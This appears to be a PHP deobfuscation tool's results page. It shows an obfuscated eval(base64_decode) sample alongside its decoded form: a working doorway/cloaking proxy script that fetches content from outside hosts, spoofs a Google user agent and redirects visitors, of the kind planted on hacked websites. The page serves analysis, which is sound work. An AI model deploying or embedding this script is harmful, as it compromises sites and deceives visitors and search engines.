Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? eval(base64_decode("ICBlcnJvcl9yZXBvcnRpbmcoMCk7ICAkdXJsID0gImh0dHA6Ly9hZG1pbmRvcnMuY29..

Decoded Output download

  error_reporting(0);  $url = "http://admindors.com/redbutton/main2-dors/13y-129-1/";  $e = '.php';  $q = "";  $test = 'suka-test';  if ((!$q || isset($_GET[$q])) && preg_match("/^[^\/][a-z0-9-_\/\.]+$/i", $a = $q ? $_GET[$q] : $_SERVER["QUERY_STRING"]))  	{  	if($test && $a == $test)  		{  		echo 'OK';  		exit;  		}  	curl_setopt($ch = curl_init($url.($w=preg_replace("/^([a-z0-9-_]+)(\.php|\.html|\/|)$/i", '$1'.$e, $a, -1, $h))), CURLOPT_RETURNTRANSFER, 1);  	curl_setopt($ch, CURLOPT_HEADER, 1);  	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);  	curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);  	if (isset($_SERVER["HTTP_REFERER"]))  		{  		curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);  		}  	$result = curl_exec($ch);    	curl_setopt($chg=curl_init($url.($w=preg_replace("/^([a-z0-9-_]+)(\.php|\.html|\/|)$/i", '$1'.$e, $a, -1, $h))), CURLOPT_RETURNTRANSFER, 1);  	curl_setopt($chg, CURLOPT_HEADER, 0);  	curl_setopt($chg, CURLOPT_FOLLOWLOCATION, 0);  	curl_setopt($chg, CURLOPT_USERAGENT, 'Google');  	$resultg = curl_exec($chg);    	$cg = curl_getinfo($chg, CURLINFO_HTTP_CODE);    	$c = curl_getinfo($ch, CURLINFO_HTTP_CODE);  	if (($c == 301 || $c == 302) && ($u = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL)))  		{	  		if ($cg == 200 && $resultg)  			{  			if (preg_match('#Location\: ([\S]+)#',$result,$rdr)) $rd = $rdr[1];  			else $rd = $u;  			header('Location: ' . $rd, true, $c);  			exit;  			}  		else  			{  			curl_setopt($chc=curl_init('http://londonpubco.com'.$_SERVER["REQUEST_URI"].'?myclearcode'), CURLOPT_RETURNTRANSFER, 1);  			curl_setopt($chc, CURLOPT_HEADER, 0);  			curl_setopt($chc, CURLOPT_FOLLOWLOCATION, 0);  			die(curl_exec($chc));  			exit;  			}  		}  	else if ($resultg=='' || $cg == 404)  		{  		curl_setopt($chc=curl_init('http://londonpubco.com'.$_SERVER["REQUEST_URI"].'?myclearcode'), CURLOPT_RETURNTRANSFER, 1);  		curl_setopt($chc, CURLOPT_HEADER, 0);  		curl_setopt($chc, CURLOPT_FOLLOWLOCATION, 0);  		die(curl_exec($chc));  		exit;  		}  	else if ($c == 200 && $result)  		{  		header('Content-Type: ' . curl_getinfo($ch, CURLINFO_CONTENT_TYPE));  		$result = preg_replace('#^.*?\<html#si','<html',$result);  		echo ($h || substr($a, -4) == '.css') ? preg_replace('/<a(.*?)href=["\'](' . preg_quote(($t = ((!strncmp($_SERVER["REQUEST_URI"], $t = $_SERVER["SCRIPT_NAME"], strlen($t))) ? ($t . '?' . ($q ? $q . '=' : '' )) : '/' . substr($_SERVER["REQUEST_URI"], 1, -strlen($a))) . ((substr($a, -1) != '/' && ($y = strrpos($a, '/'))) ? substr($a, 0, $y) . '/' : '' )), '/') . '[a-z0-9-_]+)(' . preg_quote($e) . ')["\'](.*?)>/i', '<a$1href="$2' . (($h = strlen($w) - strlen($e) - strlen($a)) < 0 ? substr($a, $h) : "") . '"$4>', preg_replace('/<(a|link|img)(.*?)(href|src)=["\']([^\/][a-z0-9-_\.\/]+)["\'](.*?)>/i', '<$1$2$3="' . $t . '$4"$5>', preg_replace('/background(-image\:|\:)(.*?url\(["\'])([^\/][a-z0-9-_\.\/]+)(["\']\))/i', 'background$1$2' . $t . '$3$4', $result))) : $result; exit;  		}  	}  header('HTTP/1.0 404 Not Found', true);  exit;

Did this file decode correctly?

Original Code

<? eval(base64_decode("ICBlcnJvcl9yZXBvcnRpbmcoMCk7ICAkdXJsID0gImh0dHA6Ly9hZG1pbmRvcnMuY29tL3JlZGJ1dHRvbi9tYWluMi1kb3JzLzEzeS0xMjktMS8iOyAgJGUgPSAnLnBocCc7ICAkcSA9ICIiOyAgJHRlc3QgPSAnc3VrYS10ZXN0JzsgIGlmICgoISRxIHx8IGlzc2V0KCRfR0VUWyRxXSkpICYmIHByZWdfbWF0Y2goIi9eW15cL11bYS16MC05LV9cL1wuXSskL2kiLCAkYSA9ICRxID8gJF9HRVRbJHFdIDogJF9TRVJWRVJbIlFVRVJZX1NUUklORyJdKSkgIAl7ICAJaWYoJHRlc3QgJiYgJGEgPT0gJHRlc3QpICAJCXsgIAkJZWNobyAnT0snOyAgCQlleGl0OyAgCQl9ICAJY3VybF9zZXRvcHQoJGNoID0gY3VybF9pbml0KCR1cmwuKCR3PXByZWdfcmVwbGFjZSgiL14oW2EtejAtOS1fXSspKFwucGhwfFwuaHRtbHxcL3wpJC9pIiwgJyQxJy4kZSwgJGEsIC0xLCAkaCkpKSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7ICAJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMSk7ICAJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAwKTsgIAljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pOyAgCWlmIChpc3NldCgkX1NFUlZFUlsiSFRUUF9SRUZFUkVSIl0pKSAgCQl7ICAJCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRUZFUkVSLCAkX1NFUlZFUlsiSFRUUF9SRUZFUkVSIl0pOyAgCQl9ICAJJHJlc3VsdCA9IGN1cmxfZXhlYygkY2gpOyAgICAJY3VybF9zZXRvcHQoJGNoZz1jdXJsX2luaXQoJHVybC4oJHc9cHJlZ19yZXBsYWNlKCIvXihbYS16MC05LV9dKykoXC5waHB8XC5odG1sfFwvfCkkL2kiLCAnJDEnLiRlLCAkYSwgLTEsICRoKSkpLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsgIAljdXJsX3NldG9wdCgkY2hnLCBDVVJMT1BUX0hFQURFUiwgMCk7ICAJY3VybF9zZXRvcHQoJGNoZywgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMCk7ICAJY3VybF9zZXRvcHQoJGNoZywgQ1VSTE9QVF9VU0VSQUdFTlQsICdHb29nbGUnKTsgIAkkcmVzdWx0ZyA9IGN1cmxfZXhlYygkY2hnKTsgICAgCSRjZyA9IGN1cmxfZ2V0aW5mbygkY2hnLCBDVVJMSU5GT19IVFRQX0NPREUpOyAgICAJJGMgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOyAgCWlmICgoJGMgPT0gMzAxIHx8ICRjID09IDMwMikgJiYgKCR1ID0gY3VybF9nZXRpbmZvKCRjaCwgQ1VSTElORk9fRUZGRUNUSVZFX1VSTCkpKSAgCQl7CSAgCQlpZiAoJGNnID09IDIwMCAmJiAkcmVzdWx0ZykgIAkJCXsgIAkJCWlmIChwcmVnX21hdGNoKCcjTG9jYXRpb25cOiAoW1xTXSspIycsJHJlc3VsdCwkcmRyKSkgJHJkID0gJHJkclsxXTsgIAkJCWVsc2UgJHJkID0gJHU7ICAJCQloZWFkZXIoJ0xvY2F0aW9uOiAnIC4gJHJkLCB0cnVlLCAkYyk7ICAJCQlleGl0OyAgCQkJfSAgCQllbHNlICAJCQl7ICAJCQljdXJsX3NldG9wdCgkY2hjPWN1cmxfaW5pdCgnaHR0cDovL2xvbmRvbnB1YmNvLmNvbScuJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0uJz9teWNsZWFyY29kZScpLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsgIAkJCWN1cmxfc2V0b3B0KCRjaGMsIENVUkxPUFRfSEVBREVSLCAwKTsgIAkJCWN1cmxfc2V0b3B0KCRjaGMsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDApOyAgCQkJZGllKGN1cmxfZXhlYygkY2hjKSk7ICAJCQlleGl0OyAgCQkJfSAgCQl9ICAJZWxzZSBpZiAoJHJlc3VsdGc9PScnIHx8ICRjZyA9PSA0MDQpICAJCXsgIAkJY3VybF9zZXRvcHQoJGNoYz1jdXJsX2luaXQoJ2h0dHA6Ly9sb25kb25wdWJjby5jb20nLiRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLic/bXljbGVhcmNvZGUnKSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7ICAJCWN1cmxfc2V0b3B0KCRjaGMsIENVUkxPUFRfSEVBREVSLCAwKTsgIAkJY3VybF9zZXRvcHQoJGNoYywgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMCk7ICAJCWRpZShjdXJsX2V4ZWMoJGNoYykpOyAgCQlleGl0OyAgCQl9ICAJZWxzZSBpZiAoJGMgPT0gMjAwICYmICRyZXN1bHQpICAJCXsgIAkJaGVhZGVyKCdDb250ZW50LVR5cGU6ICcgLiBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19DT05URU5UX1RZUEUpKTsgIAkJJHJlc3VsdCA9IHByZWdfcmVwbGFjZSgnI14uKj9cPGh0bWwjc2knLCc8aHRtbCcsJHJlc3VsdCk7ICAJCWVjaG8gKCRoIHx8IHN1YnN0cigkYSwgLTQpID09ICcuY3NzJykgPyBwcmVnX3JlcGxhY2UoJy88YSguKj8paHJlZj1bIlwnXSgnIC4gcHJlZ19xdW90ZSgoJHQgPSAoKCFzdHJuY21wKCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAkdCA9ICRfU0VSVkVSWyJTQ1JJUFRfTkFNRSJdLCBzdHJsZW4oJHQpKSkgPyAoJHQgLiAnPycgLiAoJHEgPyAkcSAuICc9JyA6ICcnICkpIDogJy8nIC4gc3Vic3RyKCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAxLCAtc3RybGVuKCRhKSkpIC4gKChzdWJzdHIoJGEsIC0xKSAhPSAnLycgJiYgKCR5ID0gc3RycnBvcygkYSwgJy8nKSkpID8gc3Vic3RyKCRhLCAwLCAkeSkgLiAnLycgOiAnJyApKSwgJy8nKSAuICdbYS16MC05LV9dKykoJyAuIHByZWdfcXVvdGUoJGUpIC4gJylbIlwnXSguKj8pPi9pJywgJzxhJDFocmVmPSIkMicgLiAoKCRoID0gc3RybGVuKCR3KSAtIHN0cmxlbigkZSkgLSBzdHJsZW4oJGEpKSA8IDAgPyBzdWJzdHIoJGEsICRoKSA6ICIiKSAuICciJDQ+JywgcHJlZ19yZXBsYWNlKCcvPChhfGxpbmt8aW1nKSguKj8pKGhyZWZ8c3JjKT1bIlwnXShbXlwvXVthLXowLTktX1wuXC9dKylbIlwnXSguKj8pPi9pJywgJzwkMSQyJDM9IicgLiAkdCAuICckNCIkNT4nLCBwcmVnX3JlcGxhY2UoJy9iYWNrZ3JvdW5kKC1pbWFnZVw6fFw6KSguKj91cmxcKFsiXCddKShbXlwvXVthLXowLTktX1wuXC9dKykoWyJcJ11cKSkvaScsICdiYWNrZ3JvdW5kJDEkMicgLiAkdCAuICckMyQ0JywgJHJlc3VsdCkpKSA6ICRyZXN1bHQ7IGV4aXQ7ICAJCX0gIAl9ICBoZWFkZXIoJ0hUVFAvMS4wIDQwNCBOb3QgRm91bmQnLCB0cnVlKTsgIGV4aXQ7ICA=")); ?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 1627af16c20128c83ed2b91a6214f904
Eval Count 1
Decode Time 90 ms